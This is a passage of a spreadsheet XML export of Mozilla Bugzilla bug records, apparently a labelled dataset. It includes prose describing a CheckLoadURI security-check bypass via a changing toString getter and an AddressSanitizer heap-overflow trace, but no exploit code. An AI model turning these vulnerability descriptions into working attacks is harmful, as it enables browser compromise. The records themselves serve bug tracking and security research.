          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.8+)
Gecko/20020217
BuildID:    2002021708
Javascript Engine bugs receive an error message.
Reproducible: Always
Steps to Reproduce:
1. Load the sample URL &lt;http://www.mozilla.org/quality/help/bugzilla-helper.html&gt;.
2. Write a bug and select the JavaScript Engine component.
3. Submit the bug.
Actual Results:  Error Message:
Possible bug database corruption has been detected. Please send mail to
endico@mozilla.org with details of what you were doing when this message
appeared. Thank you.
src = BiDi Hebrew &amp; Arabic Bookmarks Browser-General Build Config chatzilla
Compositor Cookies DOM Content Models DOM Core DOM Events DOM HTML DOM Inspector
DOM Level 0 DOM Mozilla Extensions DOM Other DOM Style DOM to Text Conversion
DOM Traversal-Range DOM Viewer DOM Views and Formatting Editor: Composer Editor:
Core Embedding: ActiveX Wrapper Embedding: APIs Embedding: Docshell Embedding:
GTK Widget Event Handling File Handling Form Manager Form Submission Help
History: Global History: Session HTML Form Controls HTMLFrames HTMLTables Image
Conversion Library ImageLib Installer Installer: XPI Packages Installer:
XPInstall Engine Internationalization Java APIs for DOM Java APIs to WebShell
Java to XPCOM Bridge Java-Implemented Plugins JavaScript Console JavaScript
Debugger JavaScript Engine Keyboard Navigation Layout Live Connect Localization
MathML MozillaTranslator Networking Networking: Cache Networking: File
Networking: FTP Networking: HTTP OJI Page Info Parser Password Manager PICS
Plug-ins Preferences Preferences: Backend Print Preview Printing Printing:
Xprint Profile Manager BackEnd Profile Manager FrontEnd Profile Migration
QuickLaunch (AKA turbo mode) RDF Search Security: CAPS Security: General
Selection Sidebar Skinability String Style System SVG Tabbed Browser Talkback
Themes Threading Tracking URL Bar User Interface Design Viewer App Views
X-remote XBL XML XP Apps XP Apps: Autocomplete XP Apps: Cmd-line Features XP
Apps: Drag and Drop XP Apps: GUI Features XP Miscellany XP Toolkit/Widgets XP
Toolkit/Widgets: Menus XP Toolkit/Widgets: Trees XP Toolkit/Widgets: XUL XP
Utilities XPCOM XPCOM Registry XPConnect xpidl XSLT
default = Javascript Engine
Expected Results:  Error should not occur.
I have tried contacting endico as the error says but I have received no reply
and the problem is not fixed.</t>
        </is>
      </c>
      <c r="X6328" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6329">
      <c r="A6329" t="n">
        <v>1067383</v>
      </c>
      <c r="B6329" t="inlineStr">
        <is>
          <t>2014-09-15 07:32:07 -0700</t>
        </is>
      </c>
      <c r="C6329" t="inlineStr">
        <is>
          <t>Properly escape commit messages</t>
        </is>
      </c>
      <c r="D6329" t="inlineStr">
        <is>
          <t>2015-05-20 04:27:22 -0700</t>
        </is>
      </c>
      <c r="E6329" t="n">
        <v>1</v>
      </c>
      <c r="F6329" t="n">
        <v>1</v>
      </c>
      <c r="G6329" t="n">
        <v>7</v>
      </c>
      <c r="H6329" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6329" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6329" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6329" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6329" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6329" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6329" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6329" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6329" t="inlineStr"/>
      <c r="Q6329" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6329" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6329" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6329" t="n">
        <v>1</v>
      </c>
      <c r="U6329" t="n">
        <v>0</v>
      </c>
      <c r="V6329" t="n">
        <v>8</v>
      </c>
      <c r="W6329" t="inlineStr">
        <is>
          <t>This push:
https://treeherder.mozilla.org/ui/#/jobs?repo=mozilla-central&amp;revision=f6a8ea81fa4e
Causes requests to:
treeherder.mozilla.org/ui/whatever.svg
Due to:
https://hg.mozilla.org/mozilla-central/rev/ae054f0a9532
'''
(no bug) Drop no-longer-correct "bitmap" qualifier from nsImageFrame header-comment. rs=tn
(It's no longer correct because we use nsImageFrame to render e.g. &lt;img src="whatever.svg"&gt;, which is not bitmap-flavored at all.) 
'''</t>
        </is>
      </c>
      <c r="X6329" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6330">
      <c r="A6330" t="n">
        <v>249332</v>
      </c>
      <c r="B6330" t="inlineStr">
        <is>
          <t>2004-06-30 20:13:55 -0700</t>
        </is>
      </c>
      <c r="C6330" t="inlineStr">
        <is>
          <t>Bypassing CheckLoadURI using custom getters and changing toString returns</t>
        </is>
      </c>
      <c r="D6330" t="inlineStr">
        <is>
          <t>2005-01-26 04:03:57 -0800</t>
        </is>
      </c>
      <c r="E6330" t="n">
        <v>1</v>
      </c>
      <c r="F6330" t="n">
        <v>1</v>
      </c>
      <c r="G6330" t="n">
        <v>3</v>
      </c>
      <c r="H6330" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6330" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6330" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6330" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6330" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6330" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6330" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6330" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6330" t="inlineStr">
        <is>
          <t>[sg:fix] have patch - need reviews caillion</t>
        </is>
      </c>
      <c r="Q6330" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6330" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6330" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6330" t="n">
        <v>1</v>
      </c>
      <c r="U6330" t="n">
        <v>0</v>
      </c>
      <c r="V6330" t="n">
        <v>15</v>
      </c>
      <c r="W6330" t="inlineStr">
        <is>
          <t>A page can make a link that, when middle-clicked, opens a chrome URL in a new tab.  
Chrome JavaScript first sends link.href to CheckLoadURI, then uses it to open a
tab.  In the exploit, link.href is an object with a toString function that
returns different values depending on how many times it has been called.
The script uses a custom href getter to make the chrome JavaScript see link.href
as an object.  link.href can't *be* an object because there is a standard href
setter for link elements.</t>
        </is>
      </c>
      <c r="X6330" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6331">
      <c r="A6331" t="n">
        <v>1288946</v>
      </c>
      <c r="B6331" t="inlineStr">
        <is>
          <t>2016-07-23 22:40:41 -0700</t>
        </is>
      </c>
      <c r="C6331" t="inlineStr">
        <is>
          <t>Out-of-bounds read in PropertyProvider::GetSpacingInternal</t>
        </is>
      </c>
      <c r="D6331" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:37 -0700</t>
        </is>
      </c>
      <c r="E6331" t="n">
        <v>1</v>
      </c>
      <c r="F6331" t="n">
        <v>1</v>
      </c>
      <c r="G6331" t="n">
        <v>3</v>
      </c>
      <c r="H6331" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6331" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6331" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K6331" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6331" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6331" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6331" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6331" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6331" t="inlineStr">
        <is>
          <t>[adv-main49+]</t>
        </is>
      </c>
      <c r="Q6331" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6331" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6331" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T6331" t="n">
        <v>1</v>
      </c>
      <c r="U6331" t="n">
        <v>0</v>
      </c>
      <c r="V6331" t="n">
        <v>26</v>
      </c>
      <c r="W6331" t="inlineStr">
        <is>
          <t>Created attachment 8774094
Testcase
==5132==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d0001bcf1f at pc 0x7fc40183ee4f bp 0x7ffd840697d0 sp 0x7ffd840697c8
READ of size 1 at 0x60d0001bcf1f thread T0 (Web Content)
SCARINESS: 12 (1-byte-read-heap-buffer-overflow)
    #0 0x7fc40183ee4e in CharAt dom/base/nsTextFragment.h:204:68
    #1 0x7fc40183ee4e in IsCSSWordSpacingSpace layout/generic/nsTextFrame.cpp:642
    #2 0x7fc40183ee4e in PropertyProvider::GetSpacingInternal(gfxTextRun::Range, gfxFont::Spacing*, bool) layout/generic/nsTextFrame.cpp:3214
    #3 0x7fc3fc9bacab in GetAdjustedSpacing gfx/thebes/gfxTextRun.cpp:343:16
    #4 0x7fc3fc9bacab in gfxTextRun::BreakAndMeasureText(unsigned int, unsigned int, bool, double, gfxTextRun::PropertyProvider*, gfxTextRun::SuppressBreak, double*, gfxFont::RunMetrics*, gfxFont::BoundingBoxType, mozilla::gfx::DrawTarget*, bool*, unsigned int*, bool, gfxBreakPriority*) gfx/thebes/gfxTextRun.cpp:857
    #5 0x7fc40187ac0a in nsTextFrame::ReflowText(nsLineLayout&amp;, int, mozilla::gfx::DrawTarget*, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsTextFrame.cpp:8969:15
    #6 0x7fc40157d573 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:946:7
    #7 0x7fc4017b221e in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:805:15
    #8 0x7fc4017b1088 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:689:7
    #9 0x7fc4017afe96 in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:466:3
    #10 0x7fc40157d4dc in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:943:13
    #11 0x7fc4015f2a0b in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) layout/generic/nsBlockFrame.cpp:4088:15
    #12 0x7fc4015f12ef in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) layout/generic/nsBlockFrame.cpp:3890:5
    #13 0x7fc4015e7cbf in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3756:9
    #14 0x7fc4015d8433 in ReflowLine layout/generic/nsBlockFrame.cpp:2754:5
    #15 0x7fc4015d8433 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2290
    #16 0x7fc4015d132c in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1171:3
    #17 0x7fc40162f3dc in ReflowChild layout/generic/nsContainerFrame.cpp:1022:14
    #18 0x7fc40162f3dc in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsCanvasFrame.cpp:644
    #19 0x7fc4016d6c16 in ReflowChild layout/generic/nsContainerFrame.cpp:1022:14
    #20 0x7fc4016d6c16 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) layout/generic/nsGfxScrollFrame.cpp:540
    #21 0x7fc4016d807d in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) layout/generic/nsGfxScrollFrame.cpp:652:3
    #22 0x7fc4016da4a1 in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsGfxScrollFrame.cpp:886:3
    #23 0x7fc40164724f in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:1065:14
    #24 0x7fc401895f47 in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsViewportFrame.cpp:314:7
    #25 0x7fc401502057 in PresShell::DoReflow(nsIFrame*, bool) layout/base/nsPresShell.cpp:9597:11
    #26 0x7fc401515d81 in PresShell::ProcessReflowCommands(bool) layout/base/nsPresShell.cpp:9770:24
    #27 0x7fc401515011 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) layout/base/nsPresShell.cpp:4142:11
    #28 0x7fc401708450 in mozilla::ScrollFrameHelper::AsyncScrollPortEvent::Run() layout/generic/nsGfxScrollFrame.cpp:4632:7
    #29 0x7fc4014eec2f in nsRootPresContext::FlushWillPaintObservers() layout/base/nsPresContext.cpp:3098:19
    #30 0x7fc401570ef4 in nsRootPresContext::RunWillPaintObservers::Run() layout/base/nsPresContext.h:1543:23
    #31 0x7fc3fa142b62 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1068:14
    #32 0x7fc3fa1c2878 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:290:10
    #33 0x7fc3faf28ec1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:100:21
    #34 0x7fc3fae9b6b0 in RunInternal ipc/chromium/src/base/message_loop.cc:232:10
    #35 0x7fc3fae9b6b0 in RunHandler ipc/chromium/src/base/message_loop.cc:225
    #36 0x7fc3fae9b6b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:205
    #37 0x7fc400b66e2f in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156:27
    #38 0x7fc402cb1237 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:829:22
    #39 0x7fc3fae9b6b0 in RunInternal ipc/chromium/src/base/message_loop.cc:232:10
    #40 0x7fc3fae9b6b0 in RunHandler ipc/chromium/src/base/message_loop.cc:225
    #41 0x7fc3fae9b6b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:205
    #42 0x7fc402cb08f8 in XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp:659:34
    #43 0x510ad9 in content_process_main ipc/contentproc/plugin-container.cpp:224:19
    #44 0x510ad9 in main browser/app/nsBrowserApp.cpp:347
    #45 0x7fc413dd2f44 in __libc_start_main /build/eglibc-oGUzwX/eglibc-2.19/csu/libc-start.c:287
0x60d0001bcf1f is located 0 bytes to the right of 79-byte region [0x60d0001bced0,0x60d0001bcf1f)
allocated by thread T0 (Web Content) here:
    #0 0x4d4ed8 in malloc _asan_rtl_
    #1 0x7fc3fd18f349 in nsTextFragment::SetTo(char16_t const*, int, bool) dom/base/nsTextFragment.cpp:281:37
    #2 0x7fc3fd083a2b in nsGenericDOMDataNode::SetTextInternal(unsigned int, unsigned int, char16_t const*, unsigned int, bool, CharacterDataChangeInfo::Details*) dom/base/nsGenericDOMDataNode.cpp:333:21
    #3 0x7fc3fd0890ae in nsGenericDOMDataNode::SetText(char16_t const*, unsigned int, bool) dom/base/nsGenericDOMDataNode.cpp:994:10
    #4 0x7fc3fc277f54 in nsHtml5TreeOperation::AppendText(char16_t const*, unsigned int, nsIContent*, nsHtml5DocumentBuilder*) parser/html/nsHtml5TreeOperation.cpp:164:14
    #5 0x7fc3fc266f43 in nsHtml5TreeBuilder::appendCharacters(void*, char16_t*, int, int) parser/html/nsHtml5TreeBuilderCppSupplement.h:561:19
    #6 0x7fc3fc20dad1 in nsHtml5TreeBuilder::flushCharacters() parser/html/nsHtml5TreeBuilder.cpp:4263:5
    #7 0x7fc3fc2564f8 in nsHtml5TreeBuilder::eof() parser/html/nsHtml5TreeBuilder.cpp:478:3
    #8 0x7fc3fc20990b in nsHtml5Tokenizer::eof() parser/html/nsHtml5Tokenizer.cpp:3849:17
    #9 0x7fc3fc212ae9 in nsHtml5StringParser::Tokenize(nsAString_internal const&amp;, nsIDocument*, bool) parser/html/nsHtml5StringParser.cpp:124:17
    #10 0x7fc3fcbe8bc6 in nsContentUtils::ParseFragmentHTML(nsAString_internal const&amp;, nsIContent*, nsIAtom*, int, bool, bool) dom/base/nsContentUtils.cpp:4518:26
    #11 0x7fc3fcdcd668 in mozilla::dom::Element::SetOuterHTML(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) dom/base/Element.cpp:3508:5
    #12 0x7fc3fe9b3997 in mozilla::dom::ElementBinding::set_outerHTML(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitSetterCallArgs) objdir-ff-asan/dom/bindings/ElementBinding.cpp:3067:9
    #13 0x7fc3fedccf89 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) dom/bindings/BindingUtils.cpp:2752:8
    #14 0x7fc404e87aa3 in CallJSNative js/src/jscntxtinlines.h:232:15
    #15 0x7fc404e87aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) js/src/vm/Interpreter.cpp:453
    #16 0x7fc404e89a79 in InternalCall js/src/vm/Interpreter.cpp:498:12
    #17 0x7fc404e89a79 in Call js/src/vm/Interpreter.cpp:517
    #18 0x7fc404e89a79 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:644
    #19 0x7fc404eeeb0e in SetExistingProperty js/src/vm/NativeObject.cpp:2364:10
    #20 0x7fc404eeeb0e in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) js/src/vm/NativeObject.cpp:2399
    #21 0x7fc404e6a96e in SetProperty js/src/vm/NativeObject.h:1495:12
    #22 0x7fc404e6a96e in SetPropertyOperation js/src/vm/Interpreter.cpp:256
    #23 0x7fc404e6a96e in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2666
    #24 0x7fc404e586f8 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:399:12
    #25 0x7fc404e8a2f3 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:679:15
    #26 0x7fc404e8aa00 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:711:12
    #27 0x7fc4049ad5ab in Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;js::StaticScope*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:4405:19
    #28 0x7fc4049ae0e6 in Evaluate js/src/jsapi.cpp:4432:12
    #29 0x7fc4049ae0e6 in JS::Evaluate(JSContext*, JS::AutoVectorRooter&lt;JSObject*&gt;&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:4493
    #30 0x7fc3fd0d72f0 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) dom/base/nsJSUtils.cpp:206:12
    #31 0x7fc3fd0d80a7 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, void**) dom/base/nsJSUtils.cpp:266:10
    #32 0x7fc3fd176995 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*) dom/base/nsScriptLoader.cpp:2010:12
    #33 0x7fc3fd17334b in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*) dom/base/nsScriptLoader.cpp:1808:10
    #34 0x7fc3fd15bf2b in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) dom/base/nsScriptLoader.cpp:1546:10
    #35 0x7fc3fd158293 in nsScriptElement::MaybeProcessScript() dom/base/nsScriptElement.cpp:141:18
    #36 0x7fc3fc272285 in AttemptToExecute dom/base/nsIScriptElement.h:221:18
    #37 0x7fc3fc272285 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) parser/html/nsHtml5TreeOpExecutor.cpp:664
SUMMARY: AddressSanitizer: heap-buffer-overflow (/mnt/scratch0/clusterfuzz/slave-bot/builds/linux_asan_firefox/custom/firefox/libxul.so+0x95fde4e)
Shadow bytes around the buggy address:
  0x0c1a8002f990: 00 00 00 00 02 fa fa fa fa fa fa fa fa fa fa fa
  0x0c1a8002f9a0: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
  0x0c1a8002f9b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1a8002f9c0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a8002f9d0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
=&gt;0x0c1a8002f9e0: 00 00 00[07]fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1a8002f9f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c1a8002fa00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00 00
  0x0c1a8002fa10: 00 00 00 00 00 00 02 fa fa fa fa fa fa fa fa fa
  0x0c1a8002fa20: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1a8002fa30: 00 02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Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==5132==ABORTING</t>
        </is>
      </c>
      <c r="X6331" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6332">
      <c r="A6332" t="n">
        <v>532577</v>
      </c>
      <c r="B6332" t="inlineStr">
        <is>
          <t>2009-12-02 19:06:56 -0800</t>
        </is>
      </c>
      <c r="C6332" t="inlineStr">
        <is>
          <t>Customizing personas will break addons manager</t>
        </is>
      </c>
      <c r="D6332" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E6332" t="n">
        <v>1</v>
      </c>
      <c r="F6332" t="n">
        <v>1</v>
      </c>
      <c r="G6332" t="n">
        <v>6</v>
      </c>
      <c r="H6332" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6332" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J6332" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K6332" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6332" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6332" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6332" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6332" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6332" t="inlineStr"/>
      <c r="Q6332" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6332" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6332" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="T6332" t="n">
        <v>1</v>
      </c>
      <c r="U6332" t="n">
        <v>0</v>
      </c>
      <c r="V6332" t="n">
        <v>8</v>
      </c>
      <c r="W6332" t="inlineStr">
        <is>
          <t>Created attachment 415795
custom persona breaks addon manager.
If you tried customizing the persona, then your addons manager will completely break.  You can't even remove the extension anymore, and must delete the profile. 
Using: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.3a1pre) Gecko/20091202 Minefield/3.7a1pre
See screenshot
Repro:
1) install latest extension at: https://ftp.mozilla.org/pub/mozilla.org/labs/personas/personas-dev-latest.xpi
2) set customized personas
3) in the edit window, change the text color to something else (already note that the custom color doesnt immediately update)
4) click ok to save.
5) open up addons manager.  Verify the window is broken and non functional.</t>
        </is>
      </c>
      <c r="X6332" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6333">
      <c r="A6333" t="n">
        <v>400303</v>
      </c>
      <c r="B6333" t="inlineStr">
        <is>
          <t>2007-10-18 11:29:20 -0700</t>
        </is>
      </c>
      <c r="C6333" t="inlineStr">
        <is>
          <t>Add Camino 1.5.2 to bouncer</t>
        </is>
      </c>
      <c r="D6333" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6333" t="n">
        <v>1</v>
      </c>
      <c r="F6333" t="n">
        <v>1</v>
      </c>
      <c r="G6333" t="n">
        <v>5</v>
      </c>
      <c r="H6333" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6333" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6333" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6333" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6333" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6333" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6333" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6333" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6333" t="inlineStr"/>
      <c r="Q6333" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6333" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6333" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6333" t="n">
        <v>1</v>
      </c>
      <c r="U6333" t="n">
        <v>0</v>
      </c>
      <c r="V6333" t="n">
        <v>2</v>
      </c>
      <c r="W6333" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #392222 +++
We're releasing Camino 1.5.2 and would like it to be added to bouncer.
Camino 1.5.2 en-US is http://ftp.mozilla.org/pub/mozilla.org/camino/releases/en-US/Camino-1.5.2.dmg .
Camino 1.5.2 multilingual is http://ftp.mozilla.org/pub/mozilla.org/camino/releases/all/Camino-1.5.2.dmg .</t>
        </is>
      </c>
      <c r="X6333" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6334">
      <c r="A6334" t="n">
        <v>814027</v>
      </c>
      <c r="B6334" t="inlineStr">
        <is>
          <t>2012-11-21 08:41:44 -0800</t>
        </is>
      </c>
      <c r="C6334" t="inlineStr">
        <is>
          <t>[FIX] mozVibrate Use-After-Free Remote Code Execution Vulnerability (ZDI-CAN-1589)</t>
        </is>
      </c>
      <c r="D6334" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6334" t="n">
        <v>1</v>
      </c>
      <c r="F6334" t="n">
        <v>1</v>
      </c>
      <c r="G6334" t="n">
        <v>3</v>
      </c>
      <c r="H6334" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6334" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6334" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6334" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L6334" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6334" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6334" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6334" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6334" t="inlineStr">
        <is>
